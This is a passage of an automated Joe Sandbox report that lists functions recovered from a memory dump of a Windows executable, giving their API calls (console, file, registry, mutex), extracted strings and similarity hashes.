                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                          • String ID:
                                                                                          • API String ID: 850181435-0
                                                                                          • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                          • Instruction ID: 3581676da88748d104d0f941d65adfd7c04153bab424961cd1bb198314b1ec49
                                                                                          • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                          • Instruction Fuzzy Hash: 2D418E32609BC2DAE7708F20D8442E9B7B4FB89B45F544135DA4D8BB48CF38D549D700
                                                                                          Function 00007FF6A0E834A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E83514
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E83522
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E83541
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E8355E
                                                                                            • Part of subcall function 00007FF6A0E836EC: _get_osfhandle.MSVCRT ref: 00007FF6A0E83715
                                                                                            • Part of subcall function 00007FF6A0E836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6A0E83770
                                                                                            • Part of subcall function 00007FF6A0E836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E83791
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                          • String ID:
                                                                                          • API String ID: 4057327938-0
                                                                                          • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                          • Instruction ID: bc16f1f125c65aafe38ac7c0443590a04bc8a20042a6931825dd31292edf3e67
                                                                                          • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                          • Instruction Fuzzy Hash: 68316131F0AA43A6E7549B35A41107DBAA0FF89B91F594175EE4EC3796DE3CE808A700
                                                                                          Function 00007FF6A0E9BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                          • String ID: KEYS$LIST$OFF
                                                                                          • API String ID: 411561164-4129271751
                                                                                          • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                          • Instruction ID: 6a3b02b9e64ea46636b1127b0b904e0c9717b4375da18d8aa271bd9dec88a0bf
                                                                                          • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                          • Instruction Fuzzy Hash: A8217F30A0AA07F2F7549B25A9411B5A6B5FF89790F509631D61EC73F5EF3CE844A700
                                                                                          Function 00007FF6A0E801B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80212
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80228
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E8023C
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80251
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 513048808-0
                                                                                          • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                          • Instruction ID: 17298b8667e8164354487566bbfae7d0d2ff77266ff71ca776e76e79c8056672
                                                                                          • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                          • Instruction Fuzzy Hash: 01216232D0E783A7E7905B64A588238AAA0FF4A765F144235E95ED27E1CF7CE448A700
                                                                                          Function 00007FF6A0E83578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 513048808-0
                                                                                          • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                          • Instruction ID: 9360532829a1180bc1ba1bfd298e21d861a24efe4ffdd5f5c546e1659e996bc3
                                                                                          • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                          • Instruction Fuzzy Hash: 7F118231A0AA83B6EA508B74A544078AAA0FF4A776F155334EA2F837D0DF3CD449B700
                                                                                          Function 00007FF6A0E9711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E971F9
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E9720D
                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E97300
                                                                                            • Part of subcall function 00007FF6A0E95740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6A0E975C4,?,?,00000000,00007FF6A0E96999,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E95744
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                          • String ID: _p0$wil
                                                                                          • API String ID: 455305043-1814513734
                                                                                          • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                          • Instruction ID: 174db93d645917f9da2d73515bbe03ca3a9cb3f7e7b423301da7f750d5010a6a
                                                                                          • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                          • Instruction Fuzzy Hash: D3619672B1A743A6EF25CF6594902B9A3A1FF88BC0F554532DA8E87754DF3CE5099300
                                                                                          Function 00007FF6A0E71DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                          • String ID: %s
                                                                                          • API String ID: 2401724867-3043279178
                                                                                          • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                          • Instruction ID: aa66959b98c0e2ab925dcff1ec252c9b985aa4f6ee021086a056ce9cad47ed80
                                                                                          • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                          • Instruction Fuzzy Hash: 9151BB72B0A683AAEB208F25D8402B977A0FF49B94F444035DE5D87795EF3CE545E700
                                                                                          Function 00007FF6A0E7E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit
                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                          • API String ID: 3849470556-1994581435
                                                                                          • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                          • Instruction ID: 8d58de1d829397e171e2d0b85088e34453f0522851ea5e81835cf8a60dc855ed
                                                                                          • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                          • Instruction Fuzzy Hash: 0B51CA32A0A643A5EB209F26E4542797BA0FF48B54F148435DA5DC33D2EF7DE884E340
                                                                                          Function 00007FF6A0E9992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E99A10
                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E99994
                                                                                            • Part of subcall function 00007FF6A0E9A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A77A
                                                                                            • Part of subcall function 00007FF6A0E9A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A839
                                                                                            • Part of subcall function 00007FF6A0E9A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A850
                                                                                          • wcsrchr.MSVCRT ref: 00007FF6A0E99A62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                          • String ID: %s=%s$.
                                                                                          • API String ID: 3242694432-4275322459
                                                                                          • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                          • Instruction ID: 30fe13a936300f9ac9354573f3f1798ccdbae0d6222f04303688f826b2fe38c1
                                                                                          • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                          • Instruction Fuzzy Hash: 4741B431B0F743A6FE109B65A4502BAA2A1FF897E0F544234DE5D877D6EE7CE845A300
                                                                                          Function 00007FF6A0E954B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E954E6
                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E9552E
                                                                                            • Part of subcall function 00007FF6A0E9758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6A0E96999,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E975AE
                                                                                            • Part of subcall function 00007FF6A0E9758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6A0E96999,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E975C6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                          • API String ID: 779401067-630742106
                                                                                          • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                          • Instruction ID: 7096df032cd786a79a9dc46345a1f0cdf5c75a8b7a24cc8a364180b8f9a729d7
                                                                                          • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                          • Instruction Fuzzy Hash: 98517173A19683A2EB219B25E4407FAA361FF887C4F554032EA4DCBB56DE7CD505D700
                                                                                          Function 00007FF6A0E8417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectorytowupper
                                                                                          • String ID: :$:
                                                                                          • API String ID: 238703822-3780739392
                                                                                          • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                          • Instruction ID: 9d9a1b67c2931cd473b2193f9dffb7614a01e9b4999d71b81f983902e503c8a5
                                                                                          • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                          • Instruction Fuzzy Hash: 0C11277260A742A5EB258B71E805279F6E0FF4D79AF458132EE0D87790DF3CD145A704
                                                                                          Function 00007FF6A0E758D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                          • API String ID: 3677997916-3870813718
                                                                                          • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                          • Instruction ID: 5a6c6394205858ed0fc8defdedc4c3d960cd045505d46bff63a1fdcc3706906f
                                                                                          • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                          • Instruction Fuzzy Hash: 15114C7261AB42D7EB108B10E44026AF7B0FBC9765F504235EB8D42B68DFBCD048DB00
                                                                                          Function 00007FF6A0E74C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
